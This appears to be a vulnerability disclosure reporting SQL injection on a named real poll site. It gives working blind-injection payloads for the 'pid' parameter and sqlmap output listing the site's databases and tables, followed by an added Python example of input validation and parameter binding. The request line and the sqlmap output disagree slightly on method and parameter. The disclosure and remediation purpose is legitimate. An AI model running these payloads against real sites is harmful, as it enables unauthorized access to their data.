
SQL Injection Vulnerability on a 178 Site

2014-08-31 12:10

Injection:

http://poll.178.com:80//post_poll.php?pid=2628 (POST)



vid=2628&vkey[]=20458&submit=





sqlmap identified the following injection points with a total of 684 HTTP(s) requests:

---

Place: GET

Parameter: pid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: pid=2628 AND 4930=4930



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: pid=2628 AND SLEEP(5)

---

web application technology: Nginx, PHP 5.2.17

back-end DBMS: MySQL 5.0.11

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: pid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: pid=2628 AND 4930=4930



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: pid=2628 AND SLEEP(5)

---

web application technology: Nginx, PHP 5.2.17

back-end DBMS: MySQL 5.0.11

available databases [4]:

[*] information_schema

[*] poll

[*] poll_new

[*] test





Database: poll_new

[22 tables]

+---------------------------------------+

| act_body |

| act_key |

| act_userinfo |

| act_userlog |

| poll_cache |

| poll_contentcategory |

| poll_contributiveness_body |

| poll_contributiveness_cate |

| poll_contributiveness_key |

| poll_contributiveness_log |

| poll_contributiveness_tag_info |

| poll_fabu_link |

| poll_key |

| poll_record |

| poll_user_field |

| poll_usergroup |

| poll_vadminuser |

| poll_vbody |

| poll_vcategory |

| poll_vkey |

| poll_vlogs |

| poll_vmod |

+---------------------------------------+



Database: poll

[30 tables]

+---------------------------------------+

| act_body |

| act_key |

| act_userinfo |

| act_userlog |

| annual |

| poll_body |

| poll_cache |

| poll_contentcategory |

| poll_contributiveness_body |

| poll_contributiveness_cate |

| poll_contributiveness_key |

| poll_contributiveness_log |

| poll_contributiveness_tag_info |

| poll_fabu_link |

| poll_fields |

| poll_fkey_info |

| poll_key |

| poll_key_extra |

| poll_logs |

| poll_record |

| poll_user_field |

| poll_user_fields |

| poll_user_log |

| poll_usergroup |

| poll_vadminuser |

| poll_vbody |

| poll_vcategory |

| poll_vkey |

| poll_vlogs |

| poll_vmod |

+---------------------------------------+



Database: information_schema

[37 tables]

+---------------------------------------+

| CHARACTER_SETS |

| COLLATIONS |

| COLLATION_CHARACTER_SET_APPLICABILITY |

| COLUMNS |

| COLUMN_PRIVILEGES |

| ENGINES |

| EVENTS |

| FILES |

| GLOBAL_STATUS |

| GLOBAL_VARIABLES |

| INNODB_CMP |

| INNODB_CMPMEM |

| INNODB_CMPMEM_RESET |

| INNODB_CMP_RESET |

| INNODB_LOCKS |

| INNODB_LOCK_WAITS |

| INNODB_TRX |

| KEY_COLUMN_USAGE |

| PARAMETERS |

| PARTITIONS |

| PLUGINS |

| PROCESSLIST |

| PROFILING |

| REFERENTIAL_CONSTRAINTS |

| ROUTINES |

| SCHEMATA |

| SCHEMA_PRIVILEGES |

| SESSION_STATUS |

| SESSION_VARIABLES |

| STATISTICS |

| TABLES |

| TABLESPACES |

| TABLE_CONSTRAINTS |

| TABLE_PRIVILEGES |

| TRIGGERS |

| USER_PRIVILEGES |

| VIEWS |

+---------------------------------------+

Proof of vulnerability:

fe.png

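Remediation:

Filter the input. In fact, there are quite a few injection points on your sites; look carefully and you will find plenty.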
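
One way to apply the recommended filtering to the `pid` parameter, shown as an added example that is not code from the report or from the site. It contrasts a concatenated lookup with one that validates the value as an integer and binds it. The `polls` table, its columns and all function names are hypothetical, and SQLite stands in for the MySQL back end so the example runs offline.

```python
import sqlite3

# Constructed stand-in for the poll database; table and column names are
# hypothetical, and SQLite replaces the MySQL back end named in the report.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE polls (pid INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO polls VALUES (?, ?)",
                   [(2628, "constructed poll A"), (2629, "constructed poll B")])
    return db

def lookup_concatenated(db, pid):
    """The 'before' pattern: request text is pasted into the SQL statement."""
    sql = "SELECT title FROM polls WHERE pid = " + pid
    return [row[0] for row in db.execute(sql)]

def parse_pid(raw):
    """Accept only a short run of ASCII digits; anything else is rejected."""
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 10):
        raise ValueError("pid must be a decimal integer")
    return int(raw)

def lookup_hardened(db, raw_pid):
    """Validate the type first, then bind the value instead of concatenating."""
    pid = parse_pid(raw_pid)
    return [row[0] for row in db.execute(
        "SELECT title FROM polls WHERE pid = ?", (pid,))]

if __name__ == "__main__":
    db = make_db()
    reported = "2628 AND 4930=4930"   # payload string from the sqlmap output
    # Concatenated: the extra condition is parsed as SQL and the row returns.
    print(lookup_concatenated(db, reported))
    # Hardened: a normal id still works, the reported string never reaches SQL.
    print(lookup_hardened(db, "2628"))
    try:
        lookup_hardened(db, reported)
    except ValueError as exc:
        print("rejected:", exc)
```

Rejected values are also worth logging: a non-numeric `pid` on this endpoint is a cheap signal that the parameter is being probed.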

Source: www.wooyun.org/bugs/wooyun-2014-068826
